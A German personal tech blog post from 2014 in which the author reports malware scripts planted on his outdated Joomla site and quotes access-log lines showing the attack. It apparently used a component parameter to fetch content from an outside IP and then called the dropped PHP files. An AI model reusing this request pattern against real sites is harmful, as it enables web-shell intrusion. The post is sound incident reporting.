Bieber LAN und Putzarbeiten

Nerd-Blog

Das Buch zum Blog !

Nerd-Wear

Nerd Wear Shop

Hier geht's zum Shop

Letzte Anschaffungen







 

Blogcounter

Kostenloser Counter

Blog Top Liste - by TopBlogs.de

Friday, May 16. 2014

Hacks Posted by Mr. Nerd in Hacks

Comments (0)
Trackbacks (0)
| Top Exits (0)
Ihre Bewertung dieses Artikels:
  2. -2
  3. -1
  4. 0
  5. +1
  6. +2
So beliebt ist der Eintrag: 1.34 of 5, 104 Stimme(n) 3322 hits
Defined tags for this entry: , , ,
Related entries by tags:

Bieber LAN und Putzarbeiten

Da bin ich kaum auf der 32. Bieber-LAN angekommen, als ich eine E-Mail meines Providers erhalte, dass auf einem meiner Webspaces Schadsoftware bzw. Schad-Scripts gefunden wurden. Na, super !
Betroffen ist eine Joomla-Installation oder vermutlich eher ein Modul oder eine Komponente darin.
Im Webspace fand sich unter "Components" eine "a.php" sowie eine "h2d45e.php". Ein Blick ins Access-Log offenbarte:

QUOTE:

188.208.33.18 - - [16/May/2014:15:41:03 +0200] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/ HTTP/1.1" 200 35147 www.*******.de "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0" "-"
188.208.33.18 - - [16/May/2014:15:41:05 +0200] "POST /index.php?nn_qp=1&url=http://5.34.177.110/about/ HTTP/1.1" 200 3 www.*******.de "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0" "-"
188.208.33.18 - - [16/May/2014:15:41:05 +0200] "POST /index.php?nn_qp=1&url=http://www.nonumber.nl/about/ HTTP/1.1" 200 26 www.*******.de "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0" "-"
188.208.33.18 - - [16/May/2014:15:41:06 +0200] "POST /components/a.php HTTP/1.1" 200 238 www.********.de "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0" "-"
188.208.33.18 - - [16/May/2014:15:41:06 +0200] "GET /components/h2d45e.php HTTP/1.1" 200 56093 www.*******.de "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20130101 Firefox/10.0" "-"


"Nonumber.nl" ist eine Joomla-Komponente, die Joomla offenbar mitkommt und auch bei mir installiert ist.
Die "http://5.34.177.110/about/" führt lediglich zu einem Webserver, der bei Aufruf die Meldung zurückgibt, dass er ordnungsgemäß funktioniert. Die IP selbst gehört zu: rot.aviationanything.com.
Es ist zum Brechen. Zugegebenermaßen: die Joomla-Installation lief noch mit 2.5.19. Also bügel' ich jetzt eben schnell die 2.5.20 drüber und lass' ein Monitor auf Dateiänderungen und -erstellungen laufen, weil ich jetzt erstmal keine Zeit und kein Interesse habe, mich den einzelnen Modulen und Kompnenten zu widmen. Heute nacht, wenn sich die Zockerei ein wenig gelegt hat und das Chillen anfängt, kann ich mich nochmal dransetzen. :-)

Trackbacks
Trackback specific URI for this entry

No Trackbacks


Comments
Display comments as (Linear | Threaded)

No comments


Add Comment
E-Mail addresses will not be displayed and will only be used for E-Mail notifications.
To leave a comment you must approve it via e-mail, which will be sent to your address after submission.
Enclosing asterisks marks text as bold (*word*), underscore are made via _word_.
Standard emoticons like :-) and ;-) are converted to images.
BBCode format allowed
Was ergibt 17+4 ?

Submitted comments will be subject to moderation before being displayed.


Frontpage - Top level

Wikipedia-Suche


Highlight a phrase and click the icon to search on using Wikipedia.

Downloads

Teamviewer
VLC-Player
Irfanview + PlugIns
Vivaldi (Webbrowser)
Firefox (Webbrowser) + Thunderbird (Mailclient)
Teamspeak 3
Far Manager
HP USB Disk Storage Format Tool
SD Formatter
UNetBootin
GEEK Uninstaller

 

Tolle URLs

Windows Hilfe Seite
Windows STOP-Codes
Windows STOP-Codes 2
ibash.de
URL Blacklist
Domainbesitzerabfrage
Tagesaktuelle Liste vergebener Ports
Portliste inkl. Trojaner-Ports
Password-Generator
MD5 Generator
Uhrzeit der Atomuhr
Malware Domain-List
Spam-Blacklist
Play it Online
Winfuture
Top 10 Provider
Notebooks reparieren
Alles über Monitore und TVs
MAC address lookup

 

Blog abonnieren

  • XML